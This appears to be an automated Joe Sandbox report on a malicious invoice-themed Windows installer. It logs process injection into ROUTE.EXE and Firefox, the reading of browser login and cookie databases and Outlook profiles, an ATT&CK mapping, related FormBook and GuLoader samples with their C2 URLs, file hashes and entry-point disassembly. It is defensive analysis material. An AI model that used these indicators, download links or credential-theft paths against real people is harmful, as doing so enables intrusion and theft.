    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtSetInformationProcess: Direct from: 0x776D2B7C
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtMapViewOfSection: Direct from: 0x776D2C3C
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtWriteVirtualMemory: Direct from: 0x776D2D5C
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtNotifyChangeKey: Direct from: 0x776D3B4C
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe | Section loaded: NULL target: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe protection: execute and read and write
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe | Section loaded: NULL target: C:\Windows\SysWOW64\ROUTE.EXE protection: execute and read and write
    Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: NULL target: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe protection: read write
    Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: NULL target: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
    Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\ROUTE.EXE | Thread register set: target process: 6596
    Source: C:\Windows\SysWOW64\ROUTE.EXE | Thread APC queued: target process: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe | Process created: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe "C:\Users\user\Desktop\FACTURA A-7507_H1758.exe"
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | Process created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"
    Source: C:\Windows\SysWOW64\ROUTE.EXE | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
    Source: vCWtwarpbXUl.exe, 00000003.00000002.30691683508.00000000016F0000.00000002.00000001.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000003.00000000.26626459530.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30692672914.0000000001A50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
    Source: vCWtwarpbXUl.exe, 00000003.00000002.30691683508.00000000016F0000.00000002.00000001.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000003.00000000.26626459530.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30692672914.0000000001A50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
    Source: vCWtwarpbXUl.exe, 00000003.00000002.30691683508.00000000016F0000.00000002.00000001.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000003.00000000.26626459530.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30692672914.0000000001A50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: .Program Manager
    Source: vCWtwarpbXUl.exe, 00000003.00000002.30691683508.00000000016F0000.00000002.00000001.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000003.00000000.26626459530.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30692672914.0000000001A50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe | Code function: 0_2_004061A0 GetVersion, GetSystemDirectoryW, GetWindowsDirectoryW, SHGetSpecialFolderLocation, SHGetPathFromIDListW, CoTaskMemFree, lstrcatW, lstrlenW

    Stealing of Sensitive Information

    Source: C:\Windows\SysWOW64\ROUTE.EXE | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
    Source: C:\Windows\SysWOW64\ROUTE.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
    Source: C:\Windows\SysWOW64\ROUTE.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
    Source: C:\Windows\SysWOW64\ROUTE.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
    Source: C:\Windows\SysWOW64\ROUTE.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
    Source: C:\Windows\SysWOW64\ROUTE.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
    Source: C:\Windows\SysWOW64\ROUTE.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
    Source: C:\Windows\SysWOW64\ROUTE.EXE | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Masquerading | 1 OS Credential Dumping | 321 Security Software Discovery | Remote Services | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
    Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 312 Process Injection | 12 Virtualization/Sandbox Evasion | LSASS Memory | 12 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 1 Access Token Manipulation | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 312 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | 1 Clipboard Data | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 14 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 3 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
    [Behavior graph] Behavior Graph ID: 1540403, Sample: FACTURA A-7507_H1758.exe, Startdate: 23/10/2024, Architecture: WINDOWS, Score: 96

    Source | Detection | Scanner | Label | Link
    FACTURA A-7507_H1758.exe | 37% | ReversingLabs | Win32.Trojan.Generic |
    Source | Detection | Scanner | Label | Link
    C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp\System.dll | 0% | ReversingLabs | |
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
                                                                                                                                                                                              unknown
                                                                                                                                                                                              http://www.quovadis.bm0FACTURA A-7507_H1758.exe, 00000002.00000003.26612423287.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26486239663.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711858259.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455162964.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455284277.0000000004F51000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ROUTE.EXE, 00000004.00000002.30464673785.0000000007C9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://gemini.google.com/app?q=ROUTE.EXE, 00000004.00000002.30464673785.0000000007C9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://support.hostinger.com/en/articles/1696789-how-to-change-nameservers-at-hostingerROUTE.EXE, 00000004.00000002.30464534254.00000000061E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      unknown
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1540403
Start date and time: 2024-10-23 18:49:19 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 16m 59s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name: Suspected Instruction Hammering
Number of analysed new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: FACTURA A-7507_H1758.exe
Detection: MAL
Classification: mal96.troj.spyw.evad.winEXE@7/10@18/15
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 86%
• Number of executed functions: 101
• Number of non-executed functions: 307
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe
• Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
• Execution Graph export aborted for target vCWtwarpbXUl.exe, PID 1628 because it is empty
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: FACTURA A-7507_H1758.exe
Time | Type | Description
12:53:49 | API Interceptor | 22389894x Sleep call for process: ROUTE.EXE modified
                                                                                                                                                                                                      • www.rsantos.shop/314m/
                                                                                                                                                                                                      rDRAWINGDWGSINC.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • www.b-ambu.com/iuk8/
                                                                                                                                                                                                      PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • www.agilizeimob.app/we8s/
                                                                                                                                                                                                      Price Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • www.anthonyholland.net/rk2p/
                                                                                                                                                                                                      PR. No.1599-Rev.2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • www.xtelify.tech/ajsw/
                                                                                                                                                                                                      quote894590895pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • www.b-ambu.com/iuk8/
                                                                                                                                                                                                      orA5ALUAmWVn51g.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • www.blind4aday.life/qwdc/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                      • 104.18.86.42
                                                                                                                                                                                                      https://1drv.ms/o/c/fca0349b9dac3054/Egg4xW-gVZtFnFIBDYLqn3IBzvGvLdCTacUKBwENWO33dQ?e=nEqWJiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                      PO-000041522.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • 188.114.97.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | ZW_PCCE-010023024001.bat | malicious | Remcos, GuLoader | 142.250.80.110, 142.250.176.193
 | Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs | malicious | GuLoader, Snake Keylogger | 142.250.80.110, 142.250.176.193
 | Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbs | malicious | GuLoader, Snake Keylogger | 142.250.80.110, 142.250.176.193
 | 69-33-600 Kreiselkammer ER3.vbs | malicious | GuLoader, Snake Keylogger | 142.250.80.110, 142.250.176.193
 | xxJfSec58P.exe | malicious | Vidar | 142.250.80.110, 142.250.176.193
 | UMrFwHyjUi.exe | malicious | Vidar | 142.250.80.110, 142.250.176.193
 | b157p9L0c1.exe | malicious | Vidar | 142.250.80.110, 142.250.176.193
 | PFlJLzFUqH.exe | malicious | Vidar | 142.250.80.110, 142.250.176.193
 | 46QSz6qyKC.exe | malicious | Vidar | 142.250.80.110, 142.250.176.193
 | rMactation.exe | malicious | GuLoader | 142.250.80.110, 142.250.176.193
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp\System.dll | PAGO_____________________________________________________________________________9300179528.exe | malicious | GuLoader
 | PAGO_____________________________________________________________________________9300179528.exe | malicious | GuLoader
 | CPP98y2eVN.exe | malicious | GuLoader
 | CPP98y2eVN.exe | malicious | GuLoader
 | WqSryO4Ykn.exe | malicious | Unknown
 | WqSryO4Ykn.exe | malicious | Unknown
 | formatfactory-4-6-1-0.exe | malicious | Unknown
 | formatfactory-4-6-1-0.exe | malicious | Unknown
 | https://files.fm/u/vtrxvgdh6w | malicious | GuLoader
Process: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe
File Type: data
Category: dropped
Size (bytes): 197370
Entropy (8bit): 2.303007215593566
Encrypted: false
SSDEEP: 1536:gymcH59Gc5gsRvBGlRSioHXJHQpqqYRVDx7XcZEflmkIcU4:DTGcml2PHXJHQsqoVDhGEdXU4
MD5: CB377A28444FF409F261D0365EAE07A2
SHA1: FAAAD1111DF502106E4794E50D8417C680830FAF
SHA-256: D3B5BAA8A5DFC2DA8457E067F22F66AC7FF8BE42C418F6083B6088069748D5D5
SHA-512: 5946444D0899CA4199FE63AAD04667DD6A24D81F81B8F33123E99F1AE8B335D7BBB5E0EBFDD99758A14A79CC67D36D4E54713C84D5A4C1AA864A1510DD8DDE72
Malicious: false
Reputation: low
Process: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe
File Type: JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=4, description=cup with tea bag iconsorn11,\001, copyright=sorn11,\001, xresolution=89, yresolution=97], progressive, precision 8, 612x557, components 3
Category: dropped
Size (bytes): 10754
Entropy (8bit): 5.834930334093723
Encrypted: false
SSDEEP: 96:tSWqknoexq/vhPBbVJ0q4fCGZI5mwTR4SIisGubz0YlLrzucuGPGWwUQh2ZFHe3u:ukna1JD4agISisRbAYdU5f/hC+IIhMz
MD5: F940675C684195C8C5557233391389A7
SHA1: AD1DCC229532141CD6D71E1E95170D7E8B8FF877
SHA-256: 54F7D7A9F6743C940763302588977FB0362111A540C057AA2812DF771A1D4991
SHA-512: 993AB6ED5DA9EEB5C483EB2B8841BED7C578BF5EF3C81A090AB99D227CAFD5C14C6DF10BE087045137C83BD77FD71DB94DCF844C83C74959C76825EA0DC6AD04
Malicious: false
Reputation: low
Process: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe
File Type: data
Category: dropped
Size (bytes): 187093
Entropy (8bit): 2.292873323299776
Encrypted: false
SSDEEP: 1536:SikPZSrM/n0/+k19FmBeCFAjTLeI2gzawjpSl7KPkuAw:MAYK+kLFmBefLp1awjkpKPrD
MD5: 9A149BE0860416EC6D96A1923E70F20B
SHA1: 635DFCD2E7D1F7F42041F051385B7FA636A24EE2
SHA-256: A1E7659B25BEAEB921A625E3A72B559F62B5B7D764AFD7B36C175657658F6154
SHA-512: E5F2E43CAB8633388024D485648E77DB9CB4DE2CB2B4548B36D668F5A6BD7FD5A06A06E98F51F8668B2A2FDA17F55D35388C8D661C506342ADBDF59C330B2745
Malicious: false
Process: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe
File Type: data
Category: dropped
Size (bytes): 27147
Entropy (8bit): 4.56515760284405
Encrypted: false
SSDEEP: 384:PCbK9oHHFhgEYGzuGMvyBWj/HHyjqxcpsb0IQKlt5/oq+7y3szruE:PJElX44BWjqcr0tKlAJzrB
MD5: 148E51D9745ABE1F7291BF38FED0C77D
SHA1: 7566D4DD400903C10E5AF568F54096943475D4A4
SHA-256: 6D1D3FC0295AC0C2103E69EFBACAA9A32819169294F92E2170B7CF5F143BC3DD
SHA-512: 48B779B150CF910BE577939E75449E609FCAB65289A70DDCF83CBB54819223FBFBF3A34538D03A77B95EAB49CFB8C9ADD8A83E660BEA42EC4A762FAF44A53901
Malicious: false
Process: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 470
Entropy (8bit): 4.304030456281103
Encrypted: false
SSDEEP: 12:qgZyEfJOjJlWFvsTiG0MiRJBQz+HcyoZVeNAf:qgoXdiG0L87ZVeAf
MD5: 8A6CCA2D4858C2C7AABE17E95DC0DA02
SHA1: 2297525713C0ECCBF7CCC2EBDC93E0AC86230710
SHA-256: D1481E4E1F9DB3F3ACC252DA4C0CFA865B947049959554193C514243FEE6BC57
                                                                                                                                                                                                                        SHA-512:DF76586812D4B0383CE3AB4FBB29D1AB5CEFA50AD1029B6430D98FBFF8BB288FAF4A469CE25D40E8D421D3FC6999E93CDB2BD5EB7E856429C7FA6730713B3636
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:muggent agouara hydranths prosaiskes titelbladets godheads.warl skandalepresses dt orlogsflag drejgade panneuritis gruppelivsforsikringernes.fultz sekundviser atleten planlseres lyophilic brandy grundejerforeninger..udgangens undtagelse rehabilitation.nonignitability semirhythmically blomsterhandleres omgrupperingen kortstilket bagne roskildenseren egeparkettet vouchee holotrichida equable..lyricising stormagasinerne stiltonoste mandiocas menuprogrammer kleptomani..
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\FACTURA A-7507_H1758.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):220360
                                                                                                                                                                                                                        Entropy (8bit):2.299301657822133
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:bX1yHIsfYIaZG840q5WNLKh4lb2sXwt9hNmN1p3WWRj3LU1:ZyHlfE340qg5sKSs2Nk1pVF7U1
                                                                                                                                                                                                                        MD5:5C249E217BA01DF588FE34C7B541AD7F
                                                                                                                                                                                                                        SHA1:474EBCC1923633E72C03959563B7F7075AA3AC06
                                                                                                                                                                                                                        SHA-256:9980E18D171153A876EF8D23E549069E90D65B305E4ED2DAB46EF776B398E1DC
                                                                                                                                                                                                                        SHA-512:BF2B4A93CF05FFFC4A42BBFF24983314339DF6A50D919C72A71B62825F6BEC6216714415E08162F5074FFA21F2A18CEAE7408F71364DCEE53E827B87DD8ECA76
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\FACTURA A-7507_H1758.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):436421
                                                                                                                                                                                                                        Entropy (8bit):7.514811181737907
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:3fcAJ3KqDXOpTRU5AfISxJIsPaKhXUcQ5WdL6GvS20M6lhEPN3LK24waEUDefv6E:eIAfIyuC5cU6KkPEPVKfEOeISaxbJc7
                                                                                                                                                                                                                        MD5:B8571C6CAE26ABE86D45E058247F9E1A
                                                                                                                                                                                                                        SHA1:1602805EF8C90D2E6E9CF492D8BD680EA576AAB3
                                                                                                                                                                                                                        SHA-256:CA25D33F92E52CD15C7995EC13537B0B505A484C4D37EEB4F398B14AAF295B2E
                                                                                                                                                                                                                        SHA-512:FCFF989FB94F886F4ADD6177C542994ED25B829A91A9ACA5BB7C6C8D7347A0673A6918D90EDAE45B0522B801156596F8676C3FF44A47B0A8D89AAF38DA37429F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\ROUTE.EXE
                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):135168
                                                                                                                                                                                                                        Entropy (8bit):1.1142956103012707
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                                                                                                                                                                                                        MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                                                                                                                                                                                                        SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                                                                                                                                                                                                        SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                                                                                                                                                                                                        SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\FACTURA A-7507_H1758.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1101918
                                                                                                                                                                                                                        Entropy (8bit):4.927194657478726
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:ZP7IIAfIyuC5cU6KkPEPVKfEOeISaxbJc3Pmzc6cxwo9K6:F95yN2U6KBNKfReISaxba3ACxwu
                                                                                                                                                                                                                        MD5:13DE7F0B4079C426F07C3D6486A42688
                                                                                                                                                                                                                        SHA1:BF5F715C4A4BAE7D1DBC4D01D14570C8BDF3C7C2
                                                                                                                                                                                                                        SHA-256:84BA1836402B00646781EB3706672970178CE2B766E5B76F27BF6F6A85EEF22E
                                                                                                                                                                                                                        SHA-512:A5FC2EB9E67659BDDBE78E2F3A9B57AC1B8DD01D8FAC3C8838CF7F96EA609FD256EE4F745E99C2B0D3DB01789BA39BB19C30CF1AD3260AD0736DC8CB1DD483DD
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\FACTURA A-7507_H1758.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):11776
                                                                                                                                                                                                                        Entropy (8bit):5.656126712214018
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:em24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlESl:m8QIl975eXqlWBrz7YLOlE
                                                                                                                                                                                                                        MD5:A4DD044BCD94E9B3370CCF095B31F896
                                                                                                                                                                                                                        SHA1:17C78201323AB2095BC53184AA8267C9187D5173
                                                                                                                                                                                                                        SHA-256:2E226715419A5882E2E14278940EE8EF0AA648A3EF7AF5B3DC252674111962BC
                                                                                                                                                                                                                        SHA-512:87335A43B9CA13E1300C7C23E702E87C669E2BCF4F6065F0C684FC53165E9C1F091CC4D79A3ECA3910F0518D3B647120AC0BE1A68EAADE2E75EAA64ADFC92C5A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                        • Filename: PAGO_____________________________________________________________________________9300179528.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: CPP98y2eVN.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: WqSryO4Ykn.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: formatfactory-4-6-1-0.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                        Entropy (8bit):7.956046061565539
                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                        File name:FACTURA A-7507_H1758.exe
                                                                                                                                                                                                                        File size:741'961 bytes
                                                                                                                                                                                                                        MD5:1595b77a26b3343c46fc12fc8ccdce82
                                                                                                                                                                                                                        SHA1:415dd7002ea68c75d88dac10c54ba115fa73776b
                                                                                                                                                                                                                        SHA256:f58da2ed79308a85d7f82d865dcc6ed12b0fe9f654fc28afcdd344761935495e
                                                                                                                                                                                                                        SHA512:2756988638df0b9b346f88acaeb4486f640567ea5b3f08f74d156cbef4b5f59af0299c9de1fb7d01f45425946a52a5dac657a3c628de7e769d317944ddace56b
                                                                                                                                                                                                                        SSDEEP:12288:Rghf/owl66vKUHnmNxh1HPc9Yuu1BB+m2tL+0y3f45XGrywUlMSbeD10cDk:ef/thTnYxbHPc9Y8ftV5XGqMSy6
                                                                                                                                                                                                                        TLSH:EAF4232076F0C923C8764774E479F5F62E69EC62DD24672B23A53E29B9B0051CE0972F
                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L....c.W.................b...*.......3............@
                                                                                                                                                                                                                        Icon Hash:2d2d2d0d0f3f772f
                                                                                                                                                                                                                        Entrypoint:0x4033b6
                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                        Time Stamp:0x57956397 [Mon Jul 25 00:55:51 2016 UTC]
                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                        Import Hash:4ea4df5d94204fc550be1874e1b77ea7
                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                        sub esp, 000002D4h
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                        push edi
                                                                                                                                                                                                                        push 00000020h
                                                                                                                                                                                                                        pop edi
                                                                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                                                                        push 00008001h
                                                                                                                                                                                                                        mov dword ptr [esp+14h], ebx
                                                                                                                                                                                                                        mov dword ptr [esp+10h], 0040A230h
                                                                                                                                                                                                                        mov dword ptr [esp+1Ch], ebx
                                                                                                                                                                                                                        call dword ptr [004080B4h]
                                                                                                                                                                                                                        call dword ptr [004080B0h]
                                                                                                                                                                                                                        cmp ax, 00000006h
                                                                                                                                                                                                                        je 00007F3D846DFD23h
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        call 00007F3D846E2E7Ch
                                                                                                                                                                                                                        cmp eax, ebx
                                                                                                                                                                                                                        je 00007F3D846DFD19h
                                                                                                                                                                                                                        push 00000C00h
                                                                                                                                                                                                                        call eax
                                                                                                                                                                                                                        mov esi, 004082B8h
